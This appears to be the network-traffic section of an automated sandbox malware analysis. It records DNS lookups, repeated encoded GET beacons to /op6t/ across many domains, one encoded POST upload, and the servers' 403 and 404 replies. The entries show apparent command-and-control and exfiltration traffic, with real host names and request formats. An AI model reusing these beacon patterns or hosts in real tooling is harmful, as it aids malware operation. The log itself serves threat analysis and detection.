        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.ng-bo.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=2K+bizHsAgvfK4Jo/uhNk3UulAHtk/DKCDOKU6rtdoeHnbYDCZc/1AXytKkQw+QkOVrLH0jtXL2IhsFkUUnXJZ7gVE9SlKcPHqW4H/CrkavSbMd4d5+KoUM= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.curty.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.beersekes.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=joKdiSi7KJbAbr0hs6/zjIJE4Behm4Eg2djH6+j8Qf7psFFLI9x7hyvntQ/EnvkMSFoG+HsqaOuOcF82SsMnr5xrxJqptXsvFzFrqoI6sGt4i0+JY4UwfJo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.l7aeh.usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=+6aS9fJbP9c9g0cefBC2hCdSY6eI42Bs0771KfpwNwRwjCkC9gP/ScKef//fPL1ZRbSBI6tgf+IRGYWXfXrYWSfcXSoVwh43zp6ZVipPdxItsiOM6ZnovEU=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.tycent520test.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.century21morenoycia.mxConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.facesofhoustontx.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.cngdesk.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=0Ny09Eq8ZBefbKkvkqaUMIZRDRlNq5VNIHijnsMzF4DJMnHDgghZ+20Zz3OB9IxSUXOfCxAz72VlILBCQfa8jvMelkWZW+WeIhBsswld1octwAWuto44rRQ=&x2=wN2xY HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.shortfox.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?x2=wN2xY&nvddg=QBE+WD5B6Jkt78kVGAOSUjwaMNkkuAvPxxlILtocCDSSbk2FnDvYucSHDfntlLOKDiDLv1Q+MrvgQctCdQiXEWmDWyfYVOljC1RMawJvJ4/x6B/DgtrXZJ0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.ng-bo.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficHTTP traffic detected: GET /op6t/?nvddg=aEKUNFeJbfSYXwp4ZCE5pj6NM5Y9npuXTcZZ2VZLyy8DmHHct0wY69Uf2FlN/+Mr5yqkWwSEcnLthRGoVw08meHK6rNA3rJY5N4rrVRcMXWX5QnofEk8vUc=&iXoT=lfKx4XoXw4a8lZu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enHost: www.getgoodscrub.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: www.l7aeh.us
        Source: global trafficDNS traffic detected: DNS query: www.tycent520test.com
        Source: global trafficDNS traffic detected: DNS query: www.baronbubbol.com
        Source: global trafficDNS traffic detected: DNS query: www.century21morenoycia.mx
        Source: global trafficDNS traffic detected: DNS query: www.vcayy.top
        Source: global trafficDNS traffic detected: DNS query: www.theertyuiergthjk.homes
        Source: global trafficDNS traffic detected: DNS query: www.facesofhoustontx.com
        Source: global trafficDNS traffic detected: DNS query: www.babyunitz.com
        Source: global trafficDNS traffic detected: DNS query: www.cngdesk.com
        Source: global trafficDNS traffic detected: DNS query: www.shortfox.top
        Source: global trafficDNS traffic detected: DNS query: www.ng-bo.online
        Source: global trafficDNS traffic detected: DNS query: www.86597.vip
        Source: global trafficDNS traffic detected: DNS query: www.curty.se
        Source: global trafficDNS traffic detected: DNS query: www.vicenc39-ns.store
        Source: global trafficDNS traffic detected: DNS query: www.beersekes.com
        Source: global trafficDNS traffic detected: DNS query: www.andywork.one
        Source: global trafficDNS traffic detected: DNS query: www.getgoodscrub.com
        Source: global trafficDNS traffic detected: DNS query: www.mustang777slot.net
        Source: global trafficDNS traffic detected: DNS query: www.miagronorte.com.ar
        Source: unknownHTTP traffic detected: POST /op6t/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.tycent520test.comOrigin: http://www.tycent520test.comReferer: http://www.tycent520test.com/op6t/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 202User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 6e 76 64 64 67 3d 7a 34 79 79 2b 72 68 2f 50 4f 41 30 68 30 49 48 63 57 47 74 2f 78 30 42 48 49 57 2f 2b 54 34 54 6b 59 62 32 4d 65 4e 62 4d 79 51 74 36 44 38 50 7a 78 57 67 59 36 6d 36 4d 2f 48 4c 61 61 51 42 42 62 66 79 50 61 52 48 58 63 41 64 49 71 37 71 65 44 37 79 62 54 69 2f 52 52 70 68 37 42 4a 4a 38 49 57 4b 66 6c 52 35 51 56 63 59 6e 77 4f 4d 32 4b 62 68 6a 6d 76 6a 79 5a 73 6f 47 31 78 45 4c 50 4e 6c 5a 73 53 79 37 34 4e 35 57 76 6d 63 4a 64 34 4d 75 2b 44 58 77 69 39 31 70 72 6e 79 63 48 34 44 72 55 6b 2f 76 73 6c 6d 2f 42 41 4e 62 2b 45 65 33 34 52 79 52 30 51 73 53 71 58 32 46 51 3d 3d Data Ascii: nvddg=z4yy+rh/POA0h0IHcWGt/x0BHIW/+T4TkYb2MeNbMyQt6D8PzxWgY6m6M/HLaaQBBbfyPaRHXcAdIq7qeD7ybTi/RRph7BJJ8IWKflR5QVcYnwOM2KbhjmvjyZsoG1xELPNlZsSy74N5WvmcJd4Mu+DXwi91prnycH4DrUk/vslm/BANb+Ee34RyR0QsSqX2FQ==
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716391913.2879038353616611341X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:31:53 GMTX-Served-By: cache-bfi-krnt7300043-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLrS/q53T25jsaPnfPkSVOt8m++C2XkuTvnlRFg2XiSDLVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716391915.9949035481464927455X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:31:55 GMTX-Served-By: cache-bfi-krnt7300056-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLpLkXwApeozbAp9OYhJGBzcG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716391918.6989036252325017526X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:31:58 GMTX-Served-By: cache-bfi-krnt7300080-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLquCTNcWTuCgj0HzMr4ZQgwm++C2XkuTvnlRFg2XiSDLVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
